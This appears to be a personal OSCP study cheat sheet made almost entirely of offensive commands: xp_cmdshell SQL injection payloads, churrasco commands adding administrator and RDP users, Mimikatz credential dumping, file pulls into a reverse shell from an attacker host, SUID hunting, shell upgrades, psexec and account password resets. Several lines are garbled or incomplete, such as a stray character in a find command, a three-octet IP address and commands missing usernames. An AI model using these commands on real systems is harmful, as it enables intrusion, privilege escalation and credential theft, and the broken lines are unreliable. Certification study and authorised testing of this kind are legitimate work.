Just Try Harder and pass the OSCP!
host -t axfr test.local 10.10.10.10
host -l test.local 10.10.10.10
Wget Transfer How to retrieve file(s) from host (inside a reverse shell)
1. Place file you want transferred in /var/www/html/
2. # service apache2 start
3. # wget http://10.10.10/pspy64 <- for single file
4. # wget -r http://10.10.10.10/pspy64/ <- for folder
- EXEC master..xp_cmdshell 'whoami';
- meh' exec master..xp_cmdshell 'whoami' --
- grep -Ri 'password' .
- find / -perm โ4000 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} ;
- c:\Inetpub>churrasco -d "net user /add "
- c:\Inetpub>churrasco -d "net localgroup administrators /add"
- c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
-
Mimikatz.exe (run it)
-
privilege::debug
-
sekurlsa::logonpasswords
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nmap -sT -sU -p- --min-rate 10000 nmap -sT -sU -p <open ports seperated by ,'s> -A obviously drop -sU if no UDP ports are open
-
TCP nmap -p- -iL ips.txt > AllTCPPorts.txt
-
UDP (can take hours so maybe netstat is a better alternative) nmap -p- -sU -iL ips.txt > udp.txt nmap -sU -sV -iL ips.txt > alludpports.txt
-
SNMP nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)
-
SSH nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt
-
SSL nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt
sshuttle -r [email protected] 10.1.1.0/24
- In reverse shell
- python -c 'import pty; pty.spawn("/bin/bash")'
- Ctrl-Z
- In Kali
- stty raw -echo
- fg
- In reverse shell
- reset (sometimes optional)
- export SHELL=bash
- export TERM=xterm-256color
- stty rows columns (optional)
-
Linux netstat syntax
- netstat -tulpn | grep LISTEN
-
FreeBSD/MacOS X netstat syntax
- netstat -anp tcp | grep LISTEN
- netstat -anp udp | grep LISTEN
-
OpenBSD netstat syntax
- netstat -na -f inet | grep LISTEN
- netstat -nat | grep LISTEN
-
Nmap scan syntax
- sudo nmap -sT -O localhost
- sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
- sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##
- Impacket's PSEXEC /usr/share/doc/python-impacket/examples/psexec.py [email protected]
Password: (password)
[*] Trying protocol 445/SMB...
- Impacket's SMBServer cd /usr/share/windows-binaries python /usr/share/doc/python-impacket/examples/smbserver.py a .
https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt
- https://github.com/samratashok/nishang
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- https://github.com/rasta-mouse/Sherlock
- net user
- net user USERNAME NEWPASS
- net user "USER NAME" NEWPASS